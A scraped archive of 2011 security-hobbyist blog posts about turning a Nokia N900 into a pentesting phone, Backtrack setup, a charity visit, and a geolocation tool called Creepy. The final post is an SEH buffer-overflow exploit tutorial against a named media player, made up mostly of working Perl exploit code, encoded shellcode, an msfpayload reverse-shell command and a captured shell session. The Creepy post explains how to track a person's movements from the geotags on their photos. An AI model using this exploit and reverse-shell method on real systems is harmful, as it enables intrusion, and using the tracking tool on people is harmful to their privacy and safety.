To pwn with pwnimage or not to on the nokia n900


Hackers For Charity

Pwineexpress has just released the pwnimage for the nokian900 to the community. http://www.pwnieexpress.com/pwn_phone.html The pwnimage is an easy to use customized n900 suited for pentests. It contains some tools you would find in backtrack. I got some time today and installed the image to my phone. Below is a screenshot. The question I have is do I use this pwnimage or do I use my manually customized n900

Reasons for the pwnimage
The image comes with presinstalled tools and easy to use shortcuts on the desktop that start applications fast. such as wifizoo,packet injection,sslstrip,metasploit.nmap,fake ap etc. This saves time for any pentester . With just a single click most these tools will run.Its awesome

Reasons against pwnimage
There is a licence agreement that you cannot reverse engineer the software etc which is a little peculiar because most of these software is under gnu or bsd licence.
I try to be paranoid, not running on not so common platforms because of backdoors ,etc

My conclusion: I will use the pwnimage, first it is a really good idea to have your n900 setup in such an easy mode to pwn for any pentest. I remember when backtrack v1 was released back then, some people argued that you could compile all those packages alone. Right now backtrack is the most widely used pentesting distro. Its not that I cannot run ./configure;make;make install or apt-get install, I love spending some sleepless nights trying to tweak my n900, its just the time saved and bringing all these packages together to work perfectly takes skill and takes time.
Several projects have come up such as Neopwn which was a little hypped up but we havent seen anything come out of it. I can run backtrack 5 on my n900 but is is a little too slow and the screen calibration on my n900 is really not just working perfectly.
Aside from the fears i know if we the “community” can really pick up this pwnimage and improve it m sure there`s better things in the future for the n900. Thanks to pwineexpress for releasing this. I choose to pwn.

Advertisements
Posted in Uncategorized | 3 Comments

Pimped by Hackers For Charity


Hackers For Charity

Just back from Uganda where I had gone for some business and also took time to visit Johnny long. He is doing well and his family is ok although he really needs your support. Today is the last day to vote for drobos so keep voting for HFC. http://www.hackersforcharity.org/hackers-for-charity/saving-lives-1-drobo-at-a-time/
I also saw Sophos challenging lulzsec to follow in the way of Johnny long. Wouldnt that be something . http://nakedsecurity.sophos.com/2011/06/16/lulzsec-hackers-heres-a-real-challenge/
It is always a pleasure meeting such a great and humble person like Johnny.Apart from catching up with Johnny and he gave me so much gear and swag. Here are some photos.

Johnny on “the beast”.He was beaten to the finish line by the guy on the far left carrying two bags of charcoal. 🙂 Its now easier to navigate Jinja with this bike. It was a miracle how Johnny got it, i guess he will soon blog about it.

Johnny`s presentation badge for Shmoocon 🙂 and notice the cool red blackhat bag.

Shmoo mouse pad

Some hardware hacking stuff, you had to program it to read ninja party to be allowed to the party

This shirt is to kill for.. literally . It is a collectors item that has a different logo at the back. It was specifically for the shmoocon conference. I am honored to get this.

HFC stickers to spread the word to all the world

Posted in Uncategorized | Leave a comment

Installing VirtualBox on Backtrack 5


Hackers For Charity

Backtrack 5 doesnt come with the kernel headers installed.So you will need to download them and then proceed with installing virtualbox. The commands are listed below

root@bt # prepare-kernel-sources
root@bt # cd /usr/src/linux
root@bt # cp -rf include/generated/* include/linux/

After this is done, edit /etc/apt/sources.list as shown below and download virtualbox

root@bt # echo deb http://download.virtualbox.org/virtualbox/debian lucid contrib non-free >> /etc/apt/sources.list

root@bt # wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | sudo apt-key add –

root@bt # apt-get update

root@bt # apt-cache search virtualbox

root@bt # apt-get install virtualbox-4.0

Posted in Uncategorized | 66 Comments

Backtrack5 on the nokia n900


Hackers For Charity

Just managed to get my sweet nokia n900 phone to run Bt5 :). For me to write a tutorial on this would be an injustice because the steps have been documented properly in this blog http://pcsci3nce.info/?p=177

Update: The blog shut down but you can access the tutorial using the way back machine from this link

https://web.archive.org/web/20110518160620/http://pcsci3nce.info/?p=177

Below is a screenshot of my phone.

Posted in Uncategorized | 3 Comments

Creepy…………….


Hackers For Charity

Last year at Dojocon, Dave Marcus gave a really awesome talk about Using Social Networks To Profile, Find and 0wn Your Victims. During the video, he was able to track a person from twitter geodata a person using loic to peform a distributed denian of service (ddos) .
Guess what, now there is a software realased to do this mainstream. Thanks to Yiannis Kakavas, creepy is alive. All you need is the twitter id or Flickr username of someone. It finds phots that somebody uploaded, extracts geolocation information from these pics and maps exactly where the data came from. It is possible for you to track somebody`s movement over time and even locate their home, if they ever twweted from home. This awesome information gathering tool can be found here. https://github.com/ilektrojohn/creepy/downloads
Its time to turn off gps geolaction features on our phones. Kindly read more about the tool here.http://www.thinq.co.uk/2011/3/30/creepy-app-warns-end-privacy/
I used a friends twitter id and pulled the map below.Now that is really creepy 🙂

User interface

Feed the username and get your data.

Posted in Uncategorized | Leave a comment

Nokia n900


Hackers For Charity

I finally managed to get my hands on a Nokia n900 series. I will let the pictures do the talking, but it is just the most awesome phone to have. I had so much fun configuring it to work as my ultimate pentesting phone. Packet injection works ok, so many pentesting tools can be installed. Enjoy my phones screenshots. There is a series for “weaponizing the nokia n900” and also there are interesting tutorials at the following links:
https://www.infosecisland.com/blogview/5640-Weaponizing-the-Nokia-N900-Part-1.html
https://www.infosecisland.com/blogview/9921-Weaponizing-the-Nokia-N900-Part-3.html
https://www.infosecisland.com/blogview/8056-Weaponizing-the-Nokia-N900-Part-2.html
http://zitstif.no-ip.org/?p=451
http://zitstif.no-ip.org/?p=459
http://www.knownokia.ca/
http://pwnieexpress.com/pwn_phone.html.

The innocent looking phone.

My “desktop”

The debian lxde and you can also chroot to /home. I love the game crazy chicken. Really easy and fun to play.Dont judge me 🙂

looks familiar ? M still testing and reconfiguring most tools from my backtrack distro.

Metasploit on the n900, need i say more …….


Yes thats meterpreter 🙂

Ettercap for mitm. Its possible to combine this with ssltrip 🙂

Packet Injection works with the bleeding-edge wl1251 driver

Posted in Uncategorized | Leave a comment

Another SEH tutorial


Hackers For Charity

The application we will look at can be downloaded here.
http://www.musanim.com/player/MAMPlayer2006aug19_035.zip
The exploit has been documented here,
http://www.exploit-db.com/exploits/15901/
but we will go through the process of creating the exploit from scratch.
Credits to corelan for their great exploit writing tutorials

Confirm the crash seriously takes place. Fill buffer with around 5000 A`s

my $filename=”firstcrash.mamx”;
my $junk=”A”x5000;
my $payload=$junk;
open($FILE,”>$filename”);
print $FILE $payload;
close($FILE);

Open the program with windbg as an executable and run it. Open the file firstcrash.mamx and the program crashes. Run f5 or g and confirm with !exchain that this is an SEH problem

0:000> g
(538.440): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=0012f10c ebp=0012f12c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+0x414140f0:
41414141 ?? ???
0:000> !exchain
0012f120: ntdll!ExecuteHandler2+3a (7c9032bc)
0012f6b0: MAM2006+3c078 (0043c078)
0012f6ec: MAM2006+3c078 (0043c078)
0012fa60: +414140f0 (41414141)
Invalid exception stack at 41414141

Second, send the 5000`s characters with a metasploit pattern so that we can be able to determine where the exactly the crash takes place.

root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb 5000 > /home/chalo/pgm/sploitattion/fat/crash.mamx

Open mamplayer with windbg again and open the crash.mamx file. The application crashes again.Press f5 or g. and then run load the byakugan plugin from metasploit to determine the offset.

0:000> !load byakugan
[Byakugan] Successfully loaded!
0:000> !pattern_offset 5000
[Byakugan] Control of ecx at offset 116.
[Byakugan] Control of eip at offset 116.

We now need to get a pop pop ret address to use. we can check the dll`s that load for the mamaplayer application and we can use msfpescan in metasploit to look for a workable address. Checking windbg and we notice some dll`s that mamplayer uses

ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll
ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
ModLoad: 10000000 10050000 C:\WINDOWS\system32\VBoxOGL.dll
ModLoad: 01780000 017c0000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll

We copy over msacm32.drv to our linux box and use msfpescan to get addresses we can use as SEH

root@bt:/pentest/exploits/framework3# ./msfpescan -p /home/chalo/pgm/sploitattion/fat/msacm32.drv > /home/chalo/pgm/sploitattion/fat/memaddresses.txt
root@bt:/home/chalo/pgm/sploitattion/fat# cat memaddresses.txt | grep “pop edi; pop esi; “
0x72d11225 pop edi; pop esi; retn 0x000c
0x72d11f39 pop edi; pop esi; retn 0x0004
0x72d1263d pop edi; pop esi; retn 0x0008
0x72d1269c pop edi; pop esi; retn 0x0008

We now need to check how the stack looks like. We put breakpoints in our code

my $filename=”crash3.mamx”;
my $junk=”A”x112;#116-4
my $nseh=”\xcc\xcc\xcc\xcc”;
my $seh=pack(‘V’,0x72d11f39);
my $shellcode=”1234567890qwertyuiopasdfghjkl”;
my $junk2=”D” x300;

my $payload=$junk.$nseh.$seh.$shellcode.$junk2;
open($FILE,”>$filename”);
print $FILE $payload;
close($FILE);

Lets check the stack.

0:000> g
(88.4ac): Break instruction exception – code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=72d11f39 edx=7c9032bc esi=0012f154 edi=7c9032a8
eip=0012fa60 esp=0012f07c ebp=0012f08c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
+0x12fa0f:
0012fa60 cc int 3
0:000> d eip
0012fa60 cc cc cc cc 39 1f d1 72-31 32 33 34 35 36 37 38 ….9..r12345678
0012fa70 39 30 61 62 63 64 65 66-67 68 69 6a 6b 6c 6d 6e 90abcdefghijklmn
0012fa80 6f 70 71 72 73 74 75 76-77 78 79 7a 44 44 44 44 opqrstuvwxyzDDDD
0012fa90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012faa0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fab0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fac0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fad0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD

Good, no spaces between our code. Now we just need to set our next seh handler(nseh) to jump 6 bytes. Replace the shellcode with break points .

my $filename=”crash3.mamx”;
my $junk=”A”x112;#116-4
my $nseh=”\xeb\x06\x90\x90″;
my $seh=pack(‘V’,0x72d11f39);
my $shellcode=”\xcc\xcc\xcc\xcc”;
my $junk2=”D” x300;

my $payload=$junk.$nseh.$seh.$shellcode.$junk2;
open($FILE,”>$filename”);
print $FILE $payload;
close($FILE);

Checking the stack again

0:000> g
(3a8.5f0): Break instruction exception – code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=72d11f39 edx=7c9032bc esi=0012f154 edi=7c9032a8
eip=0012fa68 esp=0012f07c ebp=0012f08c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
+0x12fa17:
0012fa68 cc int 3
0:000> d eip
0012fa68 cc cc cc cc 44 44 44 44-44 44 44 44 44 44 44 44 ….DDDDDDDDDDDD
0012fa78 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fa88 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fa98 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012faa8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fab8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fac8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fad8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD

Replace the breakpoints with real shellcode to pop a calc from msfpayload and pwn the application.

chalo@bt:/pentest/exploits/framework3$ ./msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | ./msfencode -e x86/alpha_upper -t c

So the new code becomes

my $filename=”crash5.mamx”;
my $junk=”A”x112;#116-4
my $nseh=”\xeb\x06\x90\x90″;
my $seh=pack(‘V’,0x72d11f39);

my $shellcode =
“\x89\xe1\xda\xcb\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43” .
“\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41” .
“\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42” .
“\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50” .
“\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4c\x49\x43\x30\x45” .
“\x50\x45\x50\x43\x50\x4b\x39\x5a\x45\x56\x51\x4e\x32\x52\x44” .
“\x4c\x4b\x56\x32\x56\x50\x4c\x4b\x51\x42\x54\x4c\x4c\x4b\x56” .
“\x32\x52\x34\x4c\x4b\x43\x42\x56\x48\x54\x4f\x4f\x47\x51\x5a” .
“\x51\x36\x56\x51\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c\x43” .
“\x51\x43\x4c\x45\x52\x56\x4c\x47\x50\x49\x51\x58\x4f\x54\x4d” .
“\x45\x51\x4f\x37\x4b\x52\x4c\x30\x50\x52\x56\x37\x4c\x4b\x56” .
“\x32\x52\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x4e\x30\x4c\x4b” .
“\x47\x30\x52\x58\x4d\x55\x49\x50\x52\x54\x50\x4a\x45\x51\x4e” .
“\x30\x56\x30\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x47\x50” .
“\x45\x51\x4e\x33\x4d\x33\x47\x4c\x50\x49\x4c\x4b\x50\x34\x4c” .
“\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x56\x51\x4f\x30\x4e\x4c” .
“\x49\x51\x58\x4f\x54\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x54” .
“\x35\x4c\x34\x45\x53\x43\x4d\x4c\x38\x47\x4b\x43\x4d\x56\x44” .
“\x52\x55\x4d\x32\x51\x48\x4c\x4b\x50\x58\x47\x54\x45\x51\x49” .
“\x43\x45\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x45\x4c” .
“\x43\x31\x58\x53\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x58\x50\x4b” .
“\x39\x50\x44\x47\x54\x47\x54\x51\x4b\x51\x4b\x43\x51\x51\x49” .
“\x51\x4a\x56\x31\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x51\x4a\x4c” .
“\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d\x43\x5a\x43\x31\x4c\x4d” .
“\x4c\x45\x4e\x59\x43\x30\x45\x50\x45\x50\x56\x30\x43\x58\x56” .
“\x51\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x49\x45\x4f\x4b\x4b\x4e” .
“\x54\x4e\x47\x42\x4b\x5a\x52\x48\x49\x36\x5a\x35\x4f\x4d\x4d” .
“\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x43\x4c\x45\x5a\x4b\x30” .
“\x4b\x4b\x4d\x30\x43\x45\x54\x45\x4f\x4b\x50\x47\x54\x53\x52” .
“\x52\x52\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x49\x45\x43\x53” .
“\x43\x51\x52\x4c\x52\x43\x56\x4e\x45\x35\x52\x58\x43\x55\x43” .
“\x30\x54\x4a\x41\x41″;

my $junk2=”D” x300;
my $payload=$junk.$nseh.$seh.$shellcode.$junk2;
open($FILE,”>$filename”);
print $FILE $payload;
close($FILE);

Open the file with the application and you will be able to pop a calc. You can modify the shellcode to do taks such as reverse shell on a tcp port.

chalo@bt:/pentest/exploits/framework3$ ./msfpayload windows/shell/reverse_tcp EXITFUNC=seh LHOST=192.168.10.1 LPORT=4444 R | ./msfencode -e x86/alpha_upper -t c

Then change your shellcode above from calc to the new shellcode for reverse shell. Set up your metasploit listener first and then after that open the new file with mamplayer . Boom !!!! 🙂 You get your reverse shell back


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(handler) > show options

Module options:

Name Current Setting Required Description
—- ————— ——– ———–

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique: seh, thread, none, process
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
— —-
0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf exploit(handler) > set EXITFUNC seh
EXITFUNC => seh
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.10.1:4444
[*] Starting the payload handler…
[*] Sending stage (240 bytes) to 192.168.10.130
[*] Command shell session 1 opened (192.168.10.1:4444 -> 192.168.10.130:1032) at Wed Jan 12 12:27:51 +0300 2011

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\bb\Desktop\rr\fat>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.10.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

C:\Documents and Settings\bb\Desktop\rr\fat>

Posted in Uncategorized | 2 Comments